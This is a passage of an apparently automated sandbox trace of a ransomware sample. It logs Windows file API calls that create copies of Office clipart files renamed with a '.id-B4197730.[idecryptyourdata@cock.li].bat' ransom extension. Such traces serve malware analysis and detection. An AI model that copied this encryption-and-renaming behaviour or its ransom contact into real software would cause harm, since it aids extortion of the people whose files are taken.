lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.179] CloseHandle (hObject=0x528) returned 1 [0168.182] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.183] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01154_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01154_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.183] CloseHandle (hObject=0x528) returned 1 [0168.184] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.184] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01157_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01157_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.184] CloseHandle (hObject=0x528) returned 1 [0168.187] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.187] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01158_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01158_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.187] CloseHandle (hObject=0x528) returned 1 [0168.188] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.189] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01161_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01161_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.189] CloseHandle (hObject=0x528) returned 1 [0168.190] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.190] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01164_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01164_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.191] CloseHandle (hObject=0x528) returned 1 [0168.192] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.192] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01293_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01293_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.192] CloseHandle (hObject=0x528) returned 1 [0168.193] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.193] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0168.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01354_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01354_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0168.193] CloseHandle (hObject=0x528) returned 1 [0171.448] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.448] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.448] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01356_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01356_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.774] CloseHandle (hObject=0x42c) returned 1 [0172.174] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.174] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02270_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02270_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.175] CloseHandle (hObject=0x42c) returned 1 [0172.176] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.176] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02278_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02278_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.176] CloseHandle (hObject=0x42c) returned 1 [0172.177] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.177] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02280_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02280_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.178] CloseHandle (hObject=0x42c) returned 1 [0172.182] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.183] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02282_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02282_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.183] CloseHandle (hObject=0x42c) returned 1 [0172.183] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.184] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02285_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02285_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.184] CloseHandle (hObject=0x42c) returned 1 [0172.184] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.184] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02287_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02287_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.185] CloseHandle (hObject=0x42c) returned 1 [0172.185] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.185] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02288_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02288_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.186] CloseHandle (hObject=0x42c) returned 1 [0172.186] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.186] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02293_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02293_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.186] CloseHandle (hObject=0x42c) returned 1 [0172.187] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.187] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02296_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02296_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.187] CloseHandle (hObject=0x42c) returned 1 [0172.188] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.188] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.188] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02369_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02369_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.188] CloseHandle (hObject=0x42c) returned 1 [0172.190] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.190] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02522_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02522_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.190] CloseHandle (hObject=0x42c) returned 1 [0172.191] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.191] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02950_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02950_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.191] CloseHandle (hObject=0x42c) returned 1 [0172.192] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.192] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02957_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02957_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.192] CloseHandle (hObject=0x42c) returned 1 [0172.193] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.193] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03236_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03236_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.193] CloseHandle (hObject=0x42c) returned 1 [0172.194] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.194] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03241_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03241_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.195] CloseHandle (hObject=0x42c) returned 1 [0172.196] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.196] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03257_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03257_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.196] CloseHandle (hObject=0x42c) returned 1 [0172.197] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.197] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03331_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03331_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.198] CloseHandle (hObject=0x42c) returned 1 [0172.198] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.198] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.198] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03339_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03339_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.199] CloseHandle (hObject=0x42c) returned 1 [0172.199] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.199] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03451_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03451_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.199] CloseHandle (hObject=0x42c) returned 1 [0172.200] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.200] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03453_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03453_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.200] CloseHandle (hObject=0x42c) returned 1 [0172.201] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.202] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03459_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03459_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.202] CloseHandle (hObject=0x42c) returned 1 [0172.202] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.203] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03464_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03464_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.203] CloseHandle (hObject=0x42c) returned 1 [0172.203] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.203] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.204] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03466_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03466_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.204] CloseHandle (hObject=0x42c) returned 1 [0172.205] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.205] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03470_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03470_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, 